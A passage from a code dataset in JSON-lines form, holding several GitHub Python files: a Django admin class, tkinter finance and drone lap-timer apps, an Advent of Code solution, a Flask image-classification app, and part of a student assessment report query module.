{'fields':(\n 'gender', 'city','country','date_of_birth',\n )\n }),\n )\n\n search_fields = ('email', 'phone_number')\n ordering = ['email']\n filter_horizontal = ()\n\n def get_inline_instances(self, request, obj=None):\n if not obj:\n return list()\n return super(CustomUserAdmin, self).get_inline_instances(request, obj)\n\nadmin.site.register(User, CustomUserAdmin)\n\n","repo_name":"inziani/UnoBackEnd","sub_path":"users/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":3041,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"41683813564","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Apr 16 12:00:54 2018\n\n@author: wegmarken\n\"\"\"\nimport tkinter as tk\nimport my_date_picker as mdp\nfrom datetime import datetime\nimport math\nimport configparser\n\ndef days_between(d1, d2):\n d1 = datetime.strptime(d1, \"%Y-%m-%d\")\n d2 = datetime.strptime(d2, \"%Y-%m-%d\")\n return abs((d2 - d1).days)\n\nclass Config:\n def __init__(self):\n filename = \"config.ini\"\n config = configparser.ConfigParser()\n rd = config.read(filename)\n if rd == []:\n config[\"DEFAULT\"] = {\"IniAmount\": \"1000\", \"MonthlyIncome\": \"100\"}\n with open(filename, 'w') as configfile:\n config.write(configfile)\n self.ini_amount = float(config[\"DEFAULT\"][\"IniAmount\"])\n self.monthly_income = float(config[\"DEFAULT\"][\"MonthlyIncome\"])\n\nclass MainGUI:\n def __init__(self, root):\n root = root\n root.title(\"Fin\")\n root.geometry(\"640x480\")\n\n self.mainframe = tk.Frame(root)\n self.mainframe.grid(column=0, row=0)\n self.mainframe.columnconfigure(0, weight=1)\n self.mainframe.rowconfigure(0, weight=1)\n\n def add_date_field(self, row, col, var, ltext):\n label = tk.Label(self.mainframe, text=ltext)\n entry = tk.Entry(self.mainframe, textvariable=var)\n btn = tk.Button(self.mainframe, text=\"Date\", bg=\"white\", fg=\"blue\", command=lambda: mdp.MyDatePicker(entry))\n label.grid(column=col, row=row)\n entry.grid(column=col + 1, row=row)\n btn.grid(column=col + 2, row=row)\n\n def add_result_field(self, row, col, func, var):\n btn = tk.Button(self.mainframe, text=\"Result\", bg=\"white\", fg=\"blue\", command=func)\n label = tk.Label(self.mainframe, textvariable=var)\n btn.grid(column=col, row=row)\n label.grid(column=col + 1, row=row)\n\n def add_num_entry_field(self, row, col, var, ltext):\n label = tk.Label(self.mainframe, text=ltext)\n entry = tk.Entry(self.mainframe, textvariable=var)\n label.grid(column=col, row=row)\n entry.grid(column=col + 1, row=row)\n\n\n\nroot = tk.Tk()\nm_gui = MainGUI(root)\n\nconfig = Config()\ntoday = datetime.today().strftime('%Y-%m-%d')\n\nstart_amount = tk.DoubleVar()\nstart_amount.set(config.ini_amount)\nm_gui.add_num_entry_field(row=1, col=1, var=start_amount, ltext=\"Start Amount\")\n\nstart_date = tk.StringVar()\nstart_date.set(today)\nm_gui.add_date_field(row=2, col=1, var=start_date, ltext=\"Start Date\")\n\nmonth_income = tk.DoubleVar()\nmonth_income.set(config.monthly_income)\nm_gui.add_num_entry_field(row=3, col=1, var=month_income, ltext=\"Monthly Income\")\n\nend_mi_date = tk.StringVar()\nend_mi_date.set(today)\nm_gui.add_date_field(row=4, col=1, var=end_mi_date, ltext=\"End In. Date\")\n\nend_date = tk.StringVar()\nend_date.set(today)\nm_gui.add_date_field(row=5, col=1, var=end_date, ltext=\"End Date\")\nres = tk.DoubleVar()\ndef fres():\n d1 = days_between(end_mi_date.get(), start_date.get())\n to_add = math.floor(d1/30)*month_income.get()\n res.set(start_amount.get() + to_add)\n\nm_gui.add_result_field(row=7, col=1, func=fres, var=res)\n\nroot.mainloop()\n\n\n\n\n","repo_name":"wegmarken2006/tk1","sub_path":"tk1_1.py","file_name":"tk1_1.py","file_ext":"py","file_size_in_byte":3114,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"73764972328","text":"from tkinter import Tk, Label, Entry, Button, Toplevel, Scrollbar, Listbox, messagebox\r\nfrom PIL import Image, ImageTk\r\nimport io\r\nimport requests\r\nimport re\r\n\r\nclass LapTracker:\r\n def __init__(self, root):\r\n # Initialize the LapTracker class with a Tkinter root window\r\n self.root = root\r\n # Initialize empty list to store lap times for each racer\r\n self.lap_times = []\r\n # Initialize Toplevel window for displaying lap times and setting its value to None\r\n self.lap_time_window = None\r\n self.lap_time_display_window = None\r\n # Initialize list of racer names with empty strings\r\n self.racer_names = [\"\", \"\", \"\", \"\"]\r\n # Initialize lists to store racer name labels and entry widgets\r\n self.racer_labels = []\r\n self.racer_entries = []\r\n # Create racer name labels and entry widgets for each racer\r\n for i in range(4):\r\n racer_name_label = Label(root, text=f\"Racer {i+1} Name:\")\r\n racer_name_entry = Entry(root)\r\n racer_name_entry.insert(0, \"NAME\")\r\n racer_name_label.grid(row=i, column=0, padx=5, pady=5, sticky=\"W\")\r\n racer_name_entry.grid(row=i, column=1, padx=5, pady=5, sticky=\"E\")\r\n self.racer_labels.append(racer_name_label)\r\n self.racer_entries.append(racer_name_entry)\r\n\r\n lap_time_label = Label(root, text=f\"Racer {i+1} Lap Time:\")\r\n lap_time_entry = Entry(root)\r\n lap_time_entry.insert(0, \"01.00\")\r\n lap_time_label.grid(row=i+4, column=0, padx=5, pady=5, sticky=\"W\")\r\n lap_time_entry.grid(row=i+4, column=1, padx=5, pady=5, sticky=\"E\")\r\n self.racer_entries.append(lap_time_entry)\r\n\r\n # Create a lap time instruction label\r\n lap_time_instruction_label = Label(root, text=\"Edit the name and times (e.g. 23.456)\")\r\n lap_time_instruction_label.grid(row=4, column=2, padx=3, pady=3, sticky=\"W\")\r\n lap_time_instruction_label = Label(root, text=\" Leave name and time alone if not in use\")\r\n lap_time_instruction_label.grid(row=5, column=2, padx=3, pady=3, sticky=\"W\")\r\n lap_time_instruction_label = Label(root, text=\" I want to say thanks to Ryan and Emily for their time and dedication to teaching programming\")\r\n lap_time_instruction_label.grid(row=6, column=2, padx=3, pady=3, sticky=\"W\")\r\n # Create a submit button to submit lap times\r\n self.submit_button = Button(root, text=\"Submit\", command=self.submit_lap_times)\r\n self.submit_button.grid(row=9, column=1, pady=5, sticky=\"E\")\r\n # Load an image from a URL using the requests and PIL libraries and display it in a Label widget\r\n img_url = \"https://i.ibb.co/3T2QgC3/45.png\"\r\n img_bytes = requests.get(img_url).content\r\n img = Image.open(io.BytesIO(img_bytes))\r\n img = img.resize((300, 200), Image.ANTIALIAS)\r\n photo = ImageTk.PhotoImage(img)\r\n label = Label(root, image=photo)\r\n label.image = photo\r\n label.grid(row=10, column=0, columnspan=2, padx=5, pady=5)\r\n\r\n # Create an exit button to close the application window\r\n exit_button = Button(root, text=\"Exit\", command=root.destroy)\r\n exit_button.grid(row=11, column=1, pady=5, sticky=\"E\")\r\n\r\n def is_valid_lap_time(self, lap_time):\r\n if lap_time == \"\":\r\n return False\r\n try:\r\n return float(lap_time) > 0\r\n except ValueError:\r\n return False\r\n def is_valid_name(self, name):\r\n # Check if name contains only letters\r\n return bool(re.match(\"^[a-zA-Z]*$\", name))\r\n def show_error_message(self, message):\r\n messagebox.showerror(\"Error\", message)\r\n def submit_lap_times(self):\r\n # Get racer names and lap times from the entry widgets and add them to the lap_times list\r\n lap_times = []\r\n for i in range(len(self.racer_entries)):\r\n if i % 2 == 0:\r\n racer_name = self.racer_entries[i].get()\r\n if not racer_name:\r\n # If racer name is empty, show an error message and return\r\n self.show_error_message(\"Racer name cannot be empty.\")\r\n return\r\n else:\r\n self.racer_names[i // 2] = racer_name\r\n else:\r\n lap_time = self.racer_entries[i].get()\r\n if not self.is_valid_lap_time(lap_time):\r\n # If lap time is invalid, show an error message and return\r\n self.show_error_message(\"Invalid lap time format. Lap time should be in the format mm:ss.ms (e.g. 23.456).\")\r\n return\r\n elif lap_time:\r\n lap_times.append((self.racer_names[i // 2], lap_time))\r\n # If the lap time display window has not been created, create it and display the lap times\r\n if self.lap_time_display_window is None:\r\n self.lap_time_display_window = Toplevel(self.root)\r\n self.lap_time_display_window.title(\"Lap Times\")\r\n self.lap_time_display_window.geometry(\"400x300\")\r\n # Load an image from a URL using the requests and PIL libraries and display it in a Label widget\r\n img_url = \"https://i.ibb.co/3mMYs96/69.png\"\r\n img_bytes = requests.get(img_url).content\r\n img = Image.open(io.BytesIO(img_bytes))\r\n img = img.resize((300, 200), Image.ANTIALIAS)\r\n photo = ImageTk.PhotoImage(img)\r\n label = Label(self.lap_time_display_window, image=photo)\r\n label.image = photo\r\n label.pack()\r\n \r\n scrollbar = Scrollbar(self.lap_time_display_window)\r\n scrollbar.pack(side=\"right\", fill=\"y\")\r\n self.lap_time_listbox = Listbox(self.lap_time_display_window, yscrollcommand=scrollbar.set)\r\n self.lap_time_listbox.pack(fill=\"both\", expand=True)\r\n scrollbar.config(command=self.lap_time_listbox.yview)\r\n \r\n copy_button = Button(self.lap_time_display_window, text=\"Copy to Clipboard\", command=lambda: self.copy_to_clipboard(lap_times))\r\n copy_button.pack()\r\n # Iterate over the lap times and add each one to the Listbox widget with alternating colors\r\n for i, (racer_name, lap_time) in enumerate(lap_times):\r\n color = \"blue\" if i % 2 == 0 else \"red\"\r\n self.lap_time_listbox.insert(\"end\", f\"{racer_name}: {lap_time}\")\r\n def copy_to_clipboard(self, lap_times):\r\n # Convert the lap times to a string with each lap time on a new line\r\n lap_times_string = \"\"\r\n for i, (racer_name, lap_time) in enumerate(lap_times):\r\n lap_times_string += f\"{racer_name}: {lap_time}\\n\"\r\n \r\n self.root.clipboard_clear()\r\n self.root.clipboard_append(lap_times_string)\r\n def add_racer(self):\r\n if len(self.racer_labels) < 4:\r\n # Add a new racer to the window with a name label and an entry field for their lap time\r\n racer_name_label = Label(self.root, text=\"Racer Name:\")\r\n racer_name_label.pack()\r\n racer_name_entry = Entry(self.root)\r\n racer_name_entry.pack()\r\n self.racer_names.append(\"\")\r\n self.racer_labels.append(racer_name_label)\r\n self.racer_entries.append(racer_name_entry)\r\n \r\n lap_time_label = Label(self.root, text=\"Enter Lap Time:\")\r\n lap_time_label.pack()\r\n lap_time_entry = Entry(self.root)\r\n lap_time_entry.pack()\r\n self.racer_entries.append(lap_time_entry)\r\n\r\nroot = Tk()\r\nroot.title(\"Drone Race Lap Tracker\")\r\nlap_tracker = LapTracker(root)\r\nroot.mainloop()","repo_name":"MasonLWest/FPV-Lap-Timer","sub_path":"FPVLapTrackerFina2l.py","file_name":"FPVLapTrackerFina2l.py","file_ext":"py","file_size_in_byte":7728,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"72279981928","text":"inFile = open(\"input.txt\")\r\n\r\ncrc = 0\r\n\r\nfor l in inFile.readlines():\r\n inList = l.split('\\t')\r\n inList[-1] = inList[-1].rsplit('\\n')[0]\r\n inList = [ int(x) for x in inList]\r\n crc += max(inList) - min(inList)\r\n\r\nprint(crc)","repo_name":"Flourish3/AdventOfCode","sub_path":"2017/AOC/day2/day2_1.py","file_name":"day2_1.py","file_ext":"py","file_size_in_byte":234,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"35628881914","text":"from flask import Flask, render_template, request, url_for\nfrom functions import predict_winner\nfrom tensorflow.keras.models import model_from_json\nfrom tensorflow.keras.preprocessing.image import load_img, img_to_array\nimport numpy as np\nimport os\nfrom werkzeug.utils import secure_filename\n\nUPLOAD_FOLDER = 'static/uploaded_images'\nALLOWED_EXTENSIONS = set(['png','jpg','jpeg','tiff'])\n\napp = Flask(__name__)\napp.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER\n\n@app.route('/')\n@app.route('/home')\ndef home():\n return render_template('home.html')\n\n@app.route('/play')\n@app.route('/play', methods=['POST'])\n# Post method to run prediction model and return what each person/comp chose and who won\ndef play():\n try:\n model\n except:\n with open('model.json', 'r') as f:\n model = model_from_json(f.read())\n\n # Load in the model weights\n model.load_weights('20_epochs.h5')\n\n # Compile the model\n model.compile(loss='categorical_crossentropy', optimizer='rmsprop', metrics=['accuracy'])\n\n if(request.method == 'POST'):\n if 'file' not in request.files:\n return render_template('play.html', predict=None)\n file = request.files['file']\n if file.filename == '':\n return render_template('play.html', predict=None)\n if file and allowed_file(file.filename):\n filename = secure_filename(file.filename)\n file.save(os.path.join(app.config['UPLOAD_FOLDER'], filename))\n\n user_image = load_img(str(app.config['UPLOAD_FOLDER'] + '/' + filename), target_size = (150,150))\n user_image = img_to_array(user_image)\n user_image = np.expand_dims(user_image, axis = 0)\n \n os.remove(os.path.join(app.config['UPLOAD_FOLDER'], filename))\n\n return render_template('play.html', predict=predict_winner(user_image, model))\n \n \n \n else:\n return render_template('play.html', predict=None)\n\ndef allowed_file(filename):\n return '.' in filename and \\\n filename.rsplit('.', 1)[1].lower() in ALLOWED_EXTENSIONS\n\nif __name__ == '__main__':\n app.run()","repo_name":"Jordan-Ireland/CNN","sub_path":"flask_app/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2150,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"33517869443","text":"# (c) 2014 The Regents of the University of California. All rights reserved,\n# subject to the license below.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may not use\n# this file except in compliance with the License. You may obtain a copy of the\n# License at http://www.apache.org/licenses/LICENSE-2.0. Unless required by\n# applicable law or agreed to in writing, software distributed under the License\n# is distributed on an \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n# KIND, either express or implied. See the License for the specific language\n# governing permissions and limitations under the License.\n\n'''\nCreated on Jan 13, 2013\n\n@author: tosako\n'''\nfrom string import capwords\nfrom sqlalchemy.sql.expression import and_, or_, null\nfrom edapi.decorators import report_config, user_info\nfrom smarter.reports.helpers.name_formatter import format_full_name\nfrom edapi.exceptions import NotFoundException\nfrom edapi.logging import audit_event\nfrom smarter.reports.helpers.breadcrumbs import get_breadcrumbs_context\nfrom smarter.reports.helpers.assessments import get_cut_points, \\\n get_overall_asmt_interval, get_claims, get_accommodations\nfrom smarter.security.context import select_with_context,\\\n get_current_request_context\nfrom smarter.reports.helpers.constants import Constants\nfrom smarter.reports.helpers.constants import AssessmentType\nfrom smarter.reports.helpers.metadata import get_custom_metadata, \\\n get_subjects_map\nfrom edcore.database.edcore_connector import EdCoreDBConnection\nfrom smarter.reports.student_administration import get_asmt_administration_years_isr\nfrom smarter.security.tenant import validate_user_tenant\nfrom smarter_common.security.constants import RolesConstants\nimport logging\nfrom sqlalchemy.sql.functions import func\n\n\nlogger = logging.getLogger('smarter')\n\n\nREPORT_NAME = 'individual_student_report'\n\n\ndef __prepare_query(connector, params):\n '''\n Returns query for individual student report\n '''\n assessment_guid = params.get(Constants.ASSESSMENTGUID)\n student_id = params.get(Constants.STUDENTGUID)\n state_code = params.get(Constants.STATECODE)\n date_taken = params.get(Constants.DATETAKEN)\n asmt_type = params.get(Constants.ASMTTYPE)\n asmt_year = params.get(Constants.ASMTYEAR)\n\n fact_asmt_outcome_vw = connector.get_table('fact_asmt_outcome_vw')\n dim_student = connector.get_table('dim_student')\n dim_asmt = connector.get_table('dim_asmt')\n query = select_with_context([\n fact_asmt_outcome_vw.c.student_id,\n dim_student.c.first_name.label('first_name'),\n dim_student.c.middle_name.label('middle_name'),\n dim_student.c.last_name.label('last_name'),\n fact_asmt_outcome_vw.c.enrl_grade.label('grade'),\n fact_asmt_outcome_vw.c.district_id.label('district_id'),\n fact_asmt_outcome_vw.c.school_id.label('school_id'),\n fact_asmt_outcome_vw.c.state_code.label('state_code'),\n fact_asmt_outcome_vw.c.date_taken.label('date_taken'),\n dim_asmt.c.asmt_subject.label('asmt_subject'),\n dim_asmt.c.asmt_period.label('asmt_period'),\n dim_asmt.c.asmt_period_year.label('asmt_period_year'),\n dim_asmt.c.asmt_type.label('asmt_type'),\n dim_asmt.c.asmt_score_min.label('asmt_score_min'),\n dim_asmt.c.asmt_score_max.label('asmt_score_max'),\n dim_asmt.c.asmt_perf_lvl_name_1.label(\"asmt_cut_point_name_1\"),\n dim_asmt.c.asmt_perf_lvl_name_2.label(\"asmt_cut_point_name_2\"),\n dim_asmt.c.asmt_perf_lvl_name_3.label(\"asmt_cut_point_name_3\"),\n dim_asmt.c.asmt_perf_lvl_name_4.label(\"asmt_cut_point_name_4\"),\n dim_asmt.c.asmt_perf_lvl_name_5.label(\"asmt_cut_point_name_5\"),\n dim_asmt.c.asmt_cut_point_1.label(\"asmt_cut_point_1\"),\n dim_asmt.c.asmt_cut_point_2.label(\"asmt_cut_point_2\"),\n dim_asmt.c.asmt_cut_point_3.label(\"asmt_cut_point_3\"),\n dim_asmt.c.asmt_cut_point_4.label(\"asmt_cut_point_4\"),\n dim_asmt.c.asmt_claim_perf_lvl_name_1.label(\"asmt_claim_perf_lvl_name_1\"),\n dim_asmt.c.asmt_claim_perf_lvl_name_2.label(\"asmt_claim_perf_lvl_name_2\"),\n dim_asmt.c.asmt_claim_perf_lvl_name_3.label(\"asmt_claim_perf_lvl_name_3\"),\n fact_asmt_outcome_vw.c.asmt_grade.label('asmt_grade'),\n fact_asmt_outcome_vw.c.asmt_score.label('asmt_score'),\n fact_asmt_outcome_vw.c.asmt_score_range_min.label('asmt_score_range_min'),\n fact_asmt_outcome_vw.c.asmt_score_range_max.label('asmt_score_range_max'),\n fact_asmt_outcome_vw.c.date_taken_day.label('date_taken_day'),\n fact_asmt_outcome_vw.c.date_taken_month.label('date_taken_month'),\n fact_asmt_outcome_vw.c.date_taken_year.label('date_taken_year'),\n fact_asmt_outcome_vw.c.asmt_perf_lvl.label('asmt_perf_lvl'),\n dim_asmt.c.asmt_claim_1_name.label('asmt_claim_1_name'),\n dim_asmt.c.asmt_claim_2_name.label('asmt_claim_2_name'),\n dim_asmt.c.asmt_claim_3_name.label('asmt_claim_3_name'),\n dim_asmt.c.asmt_claim_4_name.label('asmt_claim_4_name'),\n dim_asmt.c.asmt_claim_1_score_min.label('asmt_claim_1_score_min'),\n dim_asmt.c.asmt_claim_2_score_min.label('asmt_claim_2_score_min'),\n dim_asmt.c.asmt_claim_3_score_min.label('asmt_claim_3_score_min'),\n dim_asmt.c.asmt_claim_4_score_min.label('asmt_claim_4_score_min'),\n dim_asmt.c.asmt_claim_1_score_max.label('asmt_claim_1_score_max'),\n dim_asmt.c.asmt_claim_2_score_max.label('asmt_claim_2_score_max'),\n dim_asmt.c.asmt_claim_3_score_max.label('asmt_claim_3_score_max'),\n dim_asmt.c.asmt_claim_4_score_max.label('asmt_claim_4_score_max'),\n fact_asmt_outcome_vw.c.asmt_claim_1_score.label('asmt_claim_1_score'),\n fact_asmt_outcome_vw.c.asmt_claim_2_score.label('asmt_claim_2_score'),\n fact_asmt_outcome_vw.c.asmt_claim_3_score.label('asmt_claim_3_score'),\n fact_asmt_outcome_vw.c.asmt_claim_4_score.label('asmt_claim_4_score'),\n fact_asmt_outcome_vw.c.asmt_claim_1_score_range_min.label('asmt_claim_1_score_range_min'),\n fact_asmt_outcome_vw.c.asmt_claim_2_score_range_min.label('asmt_claim_2_score_range_min'),\n fact_asmt_outcome_vw.c.asmt_claim_3_score_range_min.label('asmt_claim_3_score_range_min'),\n fact_asmt_outcome_vw.c.asmt_claim_4_score_range_min.label('asmt_claim_4_score_range_min'),\n fact_asmt_outcome_vw.c.asmt_claim_1_score_range_max.label('asmt_claim_1_score_range_max'),\n fact_asmt_outcome_vw.c.asmt_claim_2_score_range_max.label('asmt_claim_2_score_range_max'),\n fact_asmt_outcome_vw.c.asmt_claim_3_score_range_max.label('asmt_claim_3_score_range_max'),\n fact_asmt_outcome_vw.c.asmt_claim_4_score_range_max.label('asmt_claim_4_score_range_max'),\n fact_asmt_outcome_vw.c.asmt_claim_1_perf_lvl.label('asmt_claim_1_perf_lvl'),\n fact_asmt_outcome_vw.c.asmt_claim_2_perf_lvl.label('asmt_claim_2_perf_lvl'),\n fact_asmt_outcome_vw.c.asmt_claim_3_perf_lvl.label('asmt_claim_3_perf_lvl'),\n fact_asmt_outcome_vw.c.asmt_claim_4_perf_lvl.label('asmt_claim_4_perf_lvl'),\n fact_asmt_outcome_vw.c.acc_asl_video_embed.label('acc_asl_video_embed'),\n fact_asmt_outcome_vw.c.acc_noise_buffer_nonembed.label('acc_noise_buffer_nonembed'),\n fact_asmt_outcome_vw.c.acc_print_on_demand_items_nonembed.label('acc_print_on_demand_items_nonembed'),\n fact_asmt_outcome_vw.c.acc_braile_embed.label('acc_braile_embed'),\n fact_asmt_outcome_vw.c.acc_closed_captioning_embed.label('acc_closed_captioning_embed'),\n fact_asmt_outcome_vw.c.acc_text_to_speech_embed.label('acc_text_to_speech_embed'),\n fact_asmt_outcome_vw.c.acc_abacus_nonembed.label('acc_abacus_nonembed'),\n fact_asmt_outcome_vw.c.acc_alternate_response_options_nonembed.label('acc_alternate_response_options_nonembed'),\n fact_asmt_outcome_vw.c.acc_calculator_nonembed.label('acc_calculator_nonembed'),\n fact_asmt_outcome_vw.c.acc_multiplication_table_nonembed.label('acc_multiplication_table_nonembed'),\n fact_asmt_outcome_vw.c.acc_print_on_demand_nonembed.label('acc_print_on_demand_nonembed'),\n fact_asmt_outcome_vw.c.acc_read_aloud_nonembed.label('acc_read_aloud_nonembed'),\n fact_asmt_outcome_vw.c.acc_scribe_nonembed.label('acc_scribe_nonembed'),\n fact_asmt_outcome_vw.c.acc_speech_to_text_nonembed.label('acc_speech_to_text_nonembed'),\n fact_asmt_outcome_vw.c.acc_streamline_mode.label('acc_streamline_mode'),\n fact_asmt_outcome_vw.c.administration_condition.label('administration_condition'),\n func.coalesce(fact_asmt_outcome_vw.c.complete, True).label('complete')\n ], from_obj=[\n fact_asmt_outcome_vw\n .join(dim_student, and_(fact_asmt_outcome_vw.c.student_rec_id == dim_student.c.student_rec_id))\n .join(dim_asmt, and_(dim_asmt.c.asmt_rec_id == fact_asmt_outcome_vw.c.asmt_rec_id))\n ], permission=RolesConstants.PII, state_code=state_code)\n query = query\\\n .where(\n and_(\n fact_asmt_outcome_vw.c.student_id == student_id,\n fact_asmt_outcome_vw.c.rec_status == Constants.CURRENT))\n query = query\\\n .where(and_(\n or_(and_(fact_asmt_outcome_vw.c.asmt_type.in_([AssessmentType.SUMMATIVE]),\n (or_(fact_asmt_outcome_vw.c.administration_condition == Constants.ADMINISTRATION_CONDITION_INVALID, fact_asmt_outcome_vw.c.administration_condition == null()))),\n and_(fact_asmt_outcome_vw.c.asmt_type.in_([AssessmentType.INTERIM_COMPREHENSIVE])),\n (or_(fact_asmt_outcome_vw.c.administration_condition == null(),\n fact_asmt_outcome_vw.c.administration_condition.in_([Constants.ADMINISTRATION_CONDITION_STANDARDIZED, Constants.ADMINISTRATION_CONDITION_NON_STANDARDIZED]))))))\n\n if assessment_guid is not None:\n query = query.where(dim_asmt.c.asmt_guid == assessment_guid)\n if date_taken is not None:\n query = query.where(fact_asmt_outcome_vw.c.date_taken == str(date_taken))\n if asmt_type is not None:\n query = query.where(dim_asmt.c.asmt_type == asmt_type)\n if asmt_year is not None:\n query = query.where(fact_asmt_outcome_vw.c.asmt_year == asmt_year)\n query = query.order_by(dim_asmt.c.asmt_subject.desc(), dim_asmt.c.asmt_period_year.desc())\n return query\n\n\ndef __prepare_query_iab(connector, params):\n '''\n Returns query for individual student report for IAB\n '''\n assessment_guid = params.get(Constants.ASSESSMENTGUID)\n asmt_year = params.get(Constants.ASMTYEAR)\n student_id = params.get(Constants.STUDENTGUID)\n state_code = params.get(Constants.STATECODE)\n\n fact_block_asmt_outcome = connector.get_table(Constants.FACT_BLOCK_ASMT_OUTCOME)\n dim_student = connector.get_table(Constants.DIM_STUDENT)\n dim_asmt = connector.get_table(Constants.DIM_ASMT)\n query = select_with_context([fact_block_asmt_outcome.c.student_id,\n dim_student.c.first_name.label('first_name'),\n dim_student.c.middle_name.label('middle_name'),\n dim_student.c.last_name.label('last_name'),\n fact_block_asmt_outcome.c.enrl_grade.label('enrl_grade'),\n fact_block_asmt_outcome.c.district_id.label('district_id'),\n fact_block_asmt_outcome.c.school_id.label('school_id'),\n fact_block_asmt_outcome.c.state_code.label('state_code'),\n dim_asmt.c.asmt_subject.label('asmt_subject'),\n dim_asmt.c.asmt_period.label('asmt_period'),\n dim_asmt.c.asmt_period_year.label('asmt_period_year'),\n fact_block_asmt_outcome.c.date_taken.label('date_taken'),\n dim_asmt.c.asmt_type.label('asmt_type'),\n dim_asmt.c.asmt_score_min.label('asmt_score_min'),\n dim_asmt.c.asmt_score_max.label('asmt_score_max'),\n dim_asmt.c.asmt_perf_lvl_name_1.label(\"asmt_cut_point_name_1\"),\n dim_asmt.c.asmt_perf_lvl_name_2.label(\"asmt_cut_point_name_2\"),\n dim_asmt.c.asmt_perf_lvl_name_3.label(\"asmt_cut_point_name_3\"),\n dim_asmt.c.asmt_perf_lvl_name_4.label(\"asmt_cut_point_name_4\"),\n dim_asmt.c.asmt_perf_lvl_name_5.label(\"asmt_cut_point_name_5\"),\n dim_asmt.c.asmt_cut_point_1.label(\"asmt_cut_point_1\"),\n dim_asmt.c.asmt_cut_point_2.label(\"asmt_cut_point_2\"),\n dim_asmt.c.asmt_cut_point_3.label(\"asmt_cut_point_3\"),\n dim_asmt.c.asmt_cut_point_4.label(\"asmt_cut_point_4\"),\n dim_asmt.c.asmt_claim_perf_lvl_name_1.label(\"asmt_claim_perf_lvl_name_1\"),\n dim_asmt.c.asmt_claim_perf_lvl_name_2.label(\"asmt_claim_perf_lvl_name_2\"),\n dim_asmt.c.asmt_claim_perf_lvl_name_3.label(\"asmt_claim_perf_lvl_name_3\"),\n fact_block_asmt_outcome.c.asmt_grade.label('asmt_grade'),\n fact_block_asmt_outcome.c.date_taken_day.label('date_taken_day'),\n fact_block_asmt_outcome.c.date_taken_month.label('date_taken_month'),\n fact_block_asmt_outcome.c.date_taken_year.label('date_taken_year'),\n dim_asmt.c.asmt_claim_1_name.label('asmt_claim_1_name'),\n dim_asmt.c.asmt_claim_2_name.label('asmt_claim_2_name'),\n dim_asmt.c.asmt_claim_3_name.label('asmt_claim_3_name'),\n dim_asmt.c.asmt_claim_4_name.label('asmt_claim_4_name'),\n dim_asmt.c.asmt_claim_1_score_min.label('asmt_claim_1_score_min'),\n dim_asmt.c.asmt_claim_2_score_min.label('asmt_claim_2_score_min'),\n dim_asmt.c.asmt_claim_3_score_min.label('asmt_claim_3_score_min'),\n dim_asmt.c.asmt_claim_4_score_min.label('asmt_claim_4_score_min'),\n dim_asmt.c.asmt_claim_1_score_max.label('asmt_claim_1_score_max'),\n dim_asmt.c.asmt_claim_2_score_max.label('asmt_claim_2_score_max'),\n dim_asmt.c.asmt_claim_3_score_max.label('asmt_claim_3_score_max'),\n dim_asmt.c.asmt_claim_4_score_max.label('asmt_claim_4_score_max'),\n fact_block_asmt_outcome.c.asmt_claim_1_score.label('asmt_claim_1_score'),\n fact_block_asmt_outcome.c.asmt_claim_1_score_range_min.label('asmt_claim_1_score_range_min'),\n fact_block_asmt_outcome.c.asmt_claim_1_score_range_max.label('asmt_claim_1_score_range_max'),\n fact_block_asmt_outcome.c.asmt_claim_1_perf_lvl.label('asmt_claim_1_perf_lvl'),\n fact_block_asmt_outcome.c.administration_condition.label('administration_condition'),\n func.coalesce(fact_block_asmt_outcome.c.complete, True).label('complete')],\n from_obj=[fact_block_asmt_outcome\n .join(dim_student, and_(fact_block_asmt_outcome.c.student_rec_id == dim_student.c.student_rec_id))\n .join(dim_asmt, and_(dim_asmt.c.asmt_rec_id == fact_block_asmt_outcome.c.asmt_rec_id))], permission=RolesConstants.PII, state_code=state_code)\n query = query.where(and_(fact_block_asmt_outcome.c.student_id == student_id, fact_block_asmt_outcome.c.rec_status == Constants.CURRENT, dim_asmt.c.asmt_type == AssessmentType.INTERIM_ASSESSMENT_BLOCKS))\n query = query.where(and_(or_(fact_block_asmt_outcome.c.administration_condition == null(), fact_block_asmt_outcome.c.administration_condition.in_([Constants.ADMINISTRATION_CONDITION_STANDARDIZED,\n Constants.ADMINISTRATION_CONDITION_NON_STANDARDIZED]))))\n if assessment_guid is not None:\n query = query.where(dim_asmt.c.asmt_guid == assessment_guid)\n if asmt_year is not None:\n query = query.where(fact_block_asmt_outcome.c.asmt_year == asmt_year)\n query = query.order_by(dim_asmt.c.asmt_subject.desc(), fact_block_asmt_outcome.c.asmt_grade.desc(), fact_block_asmt_outcome.c.date_taken.desc())\n return query\n\n\ndef __calculateClaimScoreRelativeDifference(item):\n '''\n calcluate relative difference for each claims\n 1. find absluate max claim score\n 2. calculate relative difference\n '''\n newItem = item.copy()\n asmt_score = newItem['asmt_score']\n claims = newItem['claims']\n maxAbsDiffScore = 0\n for claim in claims:\n score = int(claim['score'])\n # keep track max score difference\n if maxAbsDiffScore < abs(asmt_score - score):\n maxAbsDiffScore = abs(asmt_score - score)\n for claim in claims:\n score = int(claim['score'])\n if maxAbsDiffScore == 0:\n claim['claim_score_relative_difference'] = 0\n else:\n claim['claim_score_relative_difference'] = int((score - asmt_score) / maxAbsDiffScore * 100)\n return newItem\n\n\ndef __arrange_results(results, subjects_map, custom_metadata_map):\n '''\n This method arranges the data retrieved from the db to make it easier to consume by the client\n '''\n new_results = []\n for result in results:\n\n result['student_full_name'] = format_full_name(result['first_name'], result['middle_name'], result['last_name'])\n # asmt_type is an enum, so we would to capitalize it to make it presentable\n result['asmt_type'] = capwords(result['asmt_type'], ' ')\n result['asmt_score_interval'] = get_overall_asmt_interval(result)\n\n # custom metadata\n subject_name = subjects_map[result[\"asmt_subject\"]]\n custom = custom_metadata_map.get(subject_name)\n # format and rearrange cutpoints\n result = get_cut_points(custom, 